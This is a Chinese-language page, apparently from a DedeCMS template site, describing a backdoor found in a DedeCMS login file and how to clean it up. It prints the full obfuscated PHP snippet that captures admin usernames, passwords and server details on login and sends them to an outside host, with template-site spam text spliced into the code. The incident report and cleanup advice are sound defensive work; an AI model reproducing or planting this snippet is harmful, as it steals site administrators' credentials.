導讀:dedecmsdedecms需要修改的文件 include/userlogin.class.php=============================================dede模板免費織夢模板。

需要修改的文件 include/userlogin.class.php

==========================================================

文件說明：

由于之前沒有對服務器的目錄權限進行嚴格設計，被注入了很多一句話木馬文件，逐一清理后過

了幾個月，登錄系統后臺非常緩慢

追蹤登錄步驟到include/userlogin.class.php文件，發現該如下惡意代碼：

===========================================================

代碼影響說明：

該文件會將站點服務器信息，登錄的用戶名密碼，登錄地址進行記錄

通過 info.msssm.com/in/api.php?var= 地址發送到入侵者服務器

===========================================================

檢查處理辦法：

全局搜索 “base64_decode”,DedeCMS系統用到該函數的也就是插件安裝部分，對文件逐一進行

比對，發現惡意文件，及時刪除

并修改掉后臺的管理員賬號密碼和后臺管理路徑

惡意代碼如下：   if((!empty($_POST['userid'])) && (!empty($_POST['pwd']))) {     define(‘UC_ADMINSCRIPTS’, ‘dede’);     define(‘UC_ADMINCPS’, ‘aW5mby5tc3NzbS5jb20=’);     define(‘UC_NOROBOTS’, ‘L2luL2FwaS5′.’waHA/dmFyPQ==’);     define(‘UC_CURSCdede模板免費RIPTS’, function_exists (‘fsockopen’) ? true : false);     define(‘UC_SPIDERHOST’,$_SERVER['HTT'.'P_HOST'] ? $_SERVER['HTT'.'P_HOST'] :

$_SERVER['SERV'.'ER_NAME']);     define(‘UC_SPIDERSELF’,$_SERVER['PHP_S'.'ELF'] ? $_SERVER['PHP_S'.'ELF'] :

$_SERVER['SCRI'.'PT_NAME']);     $uc_config_array = array(bin2hex(UC_SPIDERHOST),bin2hex(UC_SPIDERSELF),bin2hex

($_POST['userid']),bin2hex($_POST['pwd']));     $ucbaiduget  = base64_decode (UC_NOROBOTS).UC_ADMINSCRIPTS.base64_decode

(‘JmRhdGE9′).join(‘|’,$uc_config_dede下瓻模板下載array);     $ucgoogleget = base64_decode (UC_ADMINCPS);     if(UC_CURSCRIPTS) {         $ucsockconn = @fsockopen ($ucgoogleget,80);         @fputs ($ucsockconn,"GET ".$ucbaiduget." HTTP/1.1

\r\nHost:".$ucgoogleget."\r\nConnection: Close\r\n\r\n");         @fclose ($ucsockconn);     } else {         @file_get_contents (base64_decode (‘aHR0cDovLw==’).$ucgoogleget.$ucbaiduget);     } }dede免費模板

關鍵詞標簽: 服務器 標簽 管理員